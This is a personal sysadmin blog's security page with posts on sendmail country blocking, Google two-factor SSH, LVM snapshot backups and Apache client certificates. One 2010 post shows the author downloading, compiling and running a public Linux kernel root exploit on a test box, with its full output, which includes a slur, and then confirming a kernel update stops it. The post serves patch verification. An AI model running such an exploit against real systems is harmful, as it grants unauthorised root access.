Just my Blog - Security

Block mail from certain countries with sendmail

nospam@example.com (Pieter de Rijk) — Mon, 12 Dec 2011 17:28:00 +0100

If you have your own MTA running... you are probably known with the spam-problems... Once you've tuned the filters, you have to do it again... because a new spam-run comes in. I also blocked whole /8 subnets in different countries (India/China/...)... but that is not a "real" solution... aka I want to block the whole country...

The "DNSBL" countries.nerd.dk allows you to do so... the map ip-adresses to countries based on whois-information... so on my MTAs I added the following lines to the mc sendmail file:

FEATURE(dnsbl,`br.countries.nerd.dk', `554 - Rejected - SPAM from Brazil:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`in.countries.nerd.dk', `554 - Rejected - SPAM from India:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`kr.countries.nerd.dk', `554 - Rejected - SPAM from Korea:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`cn.countries.nerd.dk', `554 - Rejected - SPAM from China:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`ro.countries.nerd.dk', `554 - Rejected - SPAM from Romenia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`co.countries.nerd.dk', `554 - Rejected - SPAM from Colombia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`mk.countries.nerd.dk', `554 - Rejected - SPAM from Macedonia:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`vn.countries.nerd.dk', `554 - Rejected - SPAM from Vietnam:$&{client_addr} rejected')dnl

FEATURE(dnsbl,`ru.countries.nerd.dk', `554 - Rejected - SPAM from Russia:$&{client_addr} rejected')dnl

And within a few hours the first are already blocked... I hope this will reduce the amount of incomming spam at the "front door". Because simply... I don't know people in these countries...

CentOS 5 enabling Two-factor SSH authentication via Google

nospam@example.com (Pieter de Rijk) — Tue, 21 Jun 2011 14:16:57 +0200

Today I noticed a very nice article about enabling Google's two-factor authentication for Linux SSH.

After reading it... I found some time to play with it... so I enabled it within 10 minutes on my CentOS 5 64bit play-ground server... but there are some small 'caveats'.

hg - Command

To checkout the code, you must make install the mercurial RPM... this one is available via the EPEL repositories.

So after having the EPEL repositories enabled, run as root:

yum -y install mercurial

Compiling the PAM module

When you checked out the code.

hg clone https://google-authenticator.googlecode.com/hg/ google-authenticator/

You cannot compile directly the module... therefor you must apply a small change to the Makefile.

Change where /usr/lib/libdl.so is stated to /usr/lib64/libdl.so (3 occurrences)

$ make
$ sudo make install

Now you've to update the /etc/pam.d/sshd so it contains:

#%PAM-1.0
auth       required     pam_google_authenticator.so
auth       include      system-auth
account    required     pam_nologin.so
account    include      system-auth
password   include      system-auth
session    optional     pam_keyinit.so force revoke
session    include      system-auth
session    required     pam_loginuid.so

Configure SSH

You also have to make sure that in /etc/ssh/sshd_config the following settings are set on yes:

ChallengeResponseAuthentication yes
UsePAM yes

And restart the SSH-daemon

Set up your smartphone/credentials on the system

$ google-authenticator
https://www.google.com/chart?chs=200x200&chld=M|0&cht=qr&chl=otpauth://totp/user@server%3Fsecret%3DSAEP64T5VZAVWAFB
Your new secret key is: SAEP64T5VZAVWAFB
Your verification code is 376046
Your emergency scratch codes are:
67868696
26247332
54815527
54336661
71083816
Do you want me to update your "~/.google_authenticator" file (y/n) y
Do you want to disallow multiple uses of the same authentication
token? This restricts you to one login about every 30s, but it increases
your chances to notice or even prevent man-in-the-middle attacks (y/n) y
By default, tokens are good for 30 seconds and in order to compensate for
possible time-skew between the client and the server, we allow an extra
token before and after the current time. If you experience problems with poor
time synchronization, you can increase the window from its default
size of 1:30min to about 4min. Do you want to do so (y/n) n
If the computer that you are logging into isn't hardened against brute-force
login attempts, you can enable rate-limiting for the authentication module.
By default, this limits attackers to no more than 3 login attempts every 30s.
Do you want to enable rate-limiting (y/n) y

And you're done

Give it a try to SSH to that box...

TIP: Make sure you've an SSH session still open... or you might lock yourself out of the system...

The Linux Kernel exploit - become root by running 32bit code on a 64bit machine

nospam@example.com (Pieter de Rijk) — Wed, 13 Oct 2010 08:30:14 +0200

A lot of discussion is about one of the last kernel exploits... the one that you can become root using 32bit code on a 64bit machine. So I wanted to know if I'm vulnerable as well... just wanted to know how it works

So I simply did (as normal user) on a vulnerable version of the Linux kernel on CentOS 5.5:

$ mkdir /tmp/expl
$ wget -O /tmp/expl/expl.c http://www.seclists.org/fulldisclosure/2010/Sep/att-268/ABftw_c.bin
$ gcc -m32 -o /tmp/expl/expl.exe /tmp/expl/expl.c

Now run the binary:

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-128.7.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff8030d360
$$$ dummy_security_ops->ffffffff80496c00
$$$ capability_ops->ffffffff8030ec20
$$$ selinux_enforcing->ffffffff80499960
$$$ audit_enabled->ffffffff80485124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# whoami
root
sh-3.2#

Well... I don't like that... so... update the kernel, reboot and check again!

[pieter@testbox ~]$ whoami
pieter
[pieter@testbox ~]$ /tmp/expl/expl.exe
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.17.1.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
!!! y0u fuq1ng f41l. g3t th3 fuq 0ut!
[pieter@testbox ~]$

Creating Snapshots of a backup using LVM snapshot

nospam@example.com (Pieter de Rijk) — Mon, 22 Feb 2010 09:18:43 +0100

Normally I used to have a backup-retention-script in place that will create a TAR-ball of the backup data (using Herakles). But this way I was not able to have a retention of longer then 3 days

So I had to look into another solution, I could add a new harddrive in the server... but there should be something else possible. So I ended up by using LVM snapshots. So I created a Volume group of about 100GB. In that volume group I created a logical volume of about 30GB, which is enough (and if not, we can 'grow' the Filesystem thanks to LVM )

After having all that done, I've created a script located in /root/scripts/lvm-snapshot. This script runs every midnight and creates a snapshot.

#!/bin/bash
#
# Create LVM Snapshots
#
#
#---------------------------------------------------------------------------------------------------------------
CURRENT_SNAPNAME="snap-"$(date "+%Y%m%d%H%M%S")
VOLUME2SNAPSHOT="/dev/vol_backup/lvm0"
LVMSNAPSHOTCMD="/usr/sbin/lvcreate -L 2G -s -n $CURRENT_SNAPNAME $VOLUME2SNAPSHOT"
LINE="---------------------------------------------------------------------------------------------------------------------"

echo $LINE
df -h /mnt/data
echo $LINE
$LVMSNAPSHOTCMD 2> /dev/null
#---------------------------------------------------------------------------------------------------------------
SNAPSHOT_RETENTION=15
CURRENT_SNAPSHOT_COUNT=$(lvdisplay | grep "^ LV Name                /dev/vol_backup/snap" | sort | awk '{ print $3 }' | wc -l)

OVERFLOW=$(echo $CURRENT_SNAPSHOT_COUNT - $SNAPSHOT_RETENTION | bc)
if [ $OVERFLOW -gt 0 ];
then
        echo $LINE
        for files in $(lvdisplay | grep "^ LV Name                /dev/vol_backup/snap" | sort | awk '{ print $3 }' | head -n$OVERFLOW);
        do
                 /usr/sbin/lvremove -f $files 2> /dev/null
        done
fi
#---------------------------------------------------------------------------------------------------------------
echo $LINE
/usr/sbin/vgdisplay vol_backup
echo $LINE
/usr/sbin/lvdisplay $VOLUME2SNAPSHOT

And the crontab entry is:

# crontab -l
0 0 * /root/scripts/lvm-snapshot

Require client-SSL certificate for certain content.

nospam@example.com (Pieter de Rijk) — Wed, 20 May 2009 15:53:13 +0200

On a kind of "intranet" website, which is secured with username/password combinations and HTTPS I've implemented the next feature:

- Authorized users can read everything on the website

- Files with in their filename "classified" requires a valid SSL-Client certificate...

Here is the output of my apache config:

<Directory /usr/sites/ssl-site/intranet/htdocs>
Options Indexes MultiViews
AllowOverride Authconfig
Order allow,deny
Allow from all
AuthName "intranet"
AuthType "Basic"
AuthUserFile /usr/sites/ssl-site/intranet/etc/users.pwl
require valid-user
</Directory>

<LocationMatch .*(c|C)(l|L)(a|A)(s|S)(s|S)(i|I)(f|F)(i|I)(e|E)(d|D).+>
SSLVerifyClient require
SSLVerifyDepth 1
SSLOptions +OptRenegotiate
</LocationMatch>

I still have to sort out some issues, like directories having a directory with the name "classified" in them.

I guess I did something wrong...

nospam@example.com (Pieter de Rijk) — Mon, 22 Dec 2008 07:32:51 +0100

Last Friday I was playing around with one of my FreeBSD production servers. On that server I've a number of users for e-mail and other services.

I was playing around as root, because I wanted to update/install some new stuff. But at a certain moment I found out that I was not able to login as a non-root user (nor as root). So first I've changed the root-password and allowed root to login via SSH. Because I had a running session to that box via a screen-session I was able to do so.

But, still needed to figure out what went wrong.

Some while ago, I've start using subversion to make backups of my config-files. And as a standard procedure I make sure I've an up to date version of the config-repository on my laptop and workstation.

I found out that the next files were modified:

/etc/passwd
/etc/master.passwd
/etc/pwd.db
/etc/spwd.db

After having these files restored, normal users were able to login in again

There were also some other files modified, but by using diff and creating a patch file I was able to restore them very quick.

So lessons learned for me about this... is... make sure you've backups, and do read the messages which pops up!

Free slave DNS server

nospam@example.com (Pieter de Rijk) — Thu, 01 May 2008 20:54:54 +0200

Currently I own and maintain some domains. For these domains you need a DNS-server to make a proper translation from hostname to ip-adress.

blog.adslweb.net -> 80.126.215.23

But to keep redundancy it is smart to have some extra DNS-servers configured. So I setup a 'master' DNS and a 'slave' DNS, but both of them were connected to a server on a ADSL line... This might not be a big problem, but due to some problems recently, I preferred to have something somewhere else

After some Google-ing, I found Twisted4Life, if you create an account, they provide you for free a 'slave' DNS.

Gentoo Firefox phones home

nospam@example.com (Pieter de Rijk) — Tue, 15 Apr 2008 09:24:33 +0200

Some while ago, I submitted a bug to the Gentoo Bug-trac. I had trouble with Firefox 2.0.0.2 when switching from non-proxy to a proxy-network.

http://bugs.gentoo.org/show_bug.cgi?id=169155

I found that when starting firefox (note: not firefox-bin) the proces wants to connect to www.gentoo.org

Now someone found the issue:

I have the same problem with mozilla-firefox-2.0.0.13.
Firefox tries to connect to the page mentioned in
/usr/lib/mozilla-firefox/defaults/pref/all-gentoo.js:
pref("browser.startup.homepage",           "http://www.gentoo.org/");
If DNS or the page itself is unreachable firefox waits until the request
timeouts.

I haven't test it yet... but it might solve the issue...

Sendmail with TLS and User-authentication

nospam@example.com (Pieter de Rijk) — Fri, 28 Mar 2008 19:25:06 +0100

Yesterday evening I completed for 50% an entry from my wish-list regarding my servers. On the backup-MTA I now have TLS and authenication enabled on Sendmail

I wanted to have this enabled, because from my laptop I often setup an SSH-tunnel, but on other devices it wasn't really possible

After some Google-ing I found this page which was really helpfull in setting the stuff up on sendmail. The next step is to use TLS between the MTA's I own and TLS between other parties who provide TLS on their MTA.